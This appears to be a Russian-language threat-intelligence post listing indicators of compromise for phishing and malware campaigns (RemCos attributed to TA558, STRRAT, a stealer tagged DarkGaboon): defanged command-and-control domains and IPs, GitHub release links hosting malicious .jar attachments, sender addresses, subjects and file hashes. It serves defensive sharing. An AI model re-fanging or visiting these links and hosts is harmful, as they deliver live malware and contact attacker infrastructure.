9bd607d41bf389ff97966fe24b401ea352baf29b2c3091d86ea800a28058bcd1#remcos
Анализ вредоносного вложения группировки TA558, Iocs, которой был представлен ранее.
К сожалению не всю часть полезной нагрузки получилось проанализировать в полной мере, если кто-то заметит причины почему не удалось выполнить динамический анализ (защитные методы были пропатчены), или будут иные комментарии, то с радостью жду их!
Доп IOC из конфигурации RemCos группировки TA558
remjouhs9kpiu1.duckdns[.]org remjouhs9kpiu2.duckdns[.]org remjouhs9kpiu3.duckdns[.]org remjouhs9kpiu4.duckdns[.]org remjouhs9kpiu5.duckdns[.]org#TA558
IOC FROM PHISHING
Либо APT-C-35 либо уроки атрибуции прогуляли...
Внутри STRRAT
Будьте внимательны большинство АВПО НЕ ВИДИТ ЕГО !!!
Отправитель: operations@yabomfbank.com.ng Темы: WU TRANSACTION BLOCKED WU TRANSACTION Pending Transactions Вложения: hxxps://github[.]com/Believemann/transaction/releases/download/swift/Swift_Transaction_Slip_pdf[.]jar hxxps://github[.]com/remit01remit/remit/releases/download/remit/Blocked_Wu_Transaction[.]jar hxxps://github[.]com/transaction1/transaction/releases/download/transaction/Blocked_Wu_Transaction[.]jar hxxps://github[.]com/remit01remit/remit/releases/download/remit/Blocked_Wu_Transaction[.]jar Сетевые IOC: str-master[.]pw mysaviourlives.ddns[.]net jrattyone.ddns[.]net 178.162.203[.]226 163.123.183[.]240 45.62.170[.]102 fullpremier.s3.eu-west-1.amazonaws[.]com SHA-256: e59ed8a6a91dc306d16da965460adb83cd8e6a284fff2c75d47884bc446fe17a 45b41525494546333fdc8e0065e432c583229997c3fe6685fee05004d8de81e8#APT-C-35 (а может и нет) #STRRAT
![IOC'S FROM PHISHING Отправитель: fbl@getfugo[.]ru Тема: Aкт cвepки Вложение: 1.zip SHA-256: b092a4d683e79b0399b65f2c9fa2b3a94](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAATACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDQFja4H7hP++RR9gtf+eEf/fIqcDKindutAFb7Ba/88I/++RR9htP+eMf/AHyKsYo20AV/sNr/AM8I/wDvkUVYxiigDmf7Tu/+ev8A44v+FH9p3f8Az1/8cX/CiigA/tO7/wCev/ji/wCFH9p3f/PX/wAcX/CiigA/tO8HIm/8cX/CiiigD//Z)
IOC'S FROM PHISHING
Отправитель: fbl@getfugo[.]ru Тема: Aкт cвepки Вложение: 1.zip SHA-256: b092a4d683e79b0399b65f2c9fa2b3a94a54c31e42a40b819a2310c122d5d443 Нагрузка: Aкт cвepки взaимныx pacчeтoв пo cocтoянию нa 21.04.2025 гoдa.xsl.scr SHA-256: 0b85d7d6348e363614b5b4f57c7258af11f309ec54eb1e8c62d8bb2724b13135 Отправитель: fbl@master-22[.]ru Тема: Запрос на сверку взаиморасчетов Вложение: 1.zip SHA-256: 0e1da762e953e5d122ed468d97a1e700acb3ec55ab7e4865b8b52db6d6b7b35a Нагрузка: Aкт cвepки взaимныx pacчeтoв пo cocтoянию нa 21.04.2025 гoдa.xsl.scr SHA-256: 0b85d7d6348e363614b5b4f57c7258af11f309ec54eb1e8c62d8bb2724b13135 Нагрузка накрыта: themida Отправитель: karen@newrich[.]tw Тема: Inquiry // Air shipment // From IAH TO TX 79763 // AWB#235-92153272 H 25038823 Вложение: 34556lz6y.zip SHA-256: 2ecdedf520d0e8db60ae9184946a6abe5e037d3f32a7824230d802bde35c424a Полезная нагрузка: 34556lZ6Y.exe SHA-256: 5e4675293aef9541e937220098ea561b15c44d2e22d8ac1fe3f4e0ee8b5aa09f#Stealer #DarkGaboon
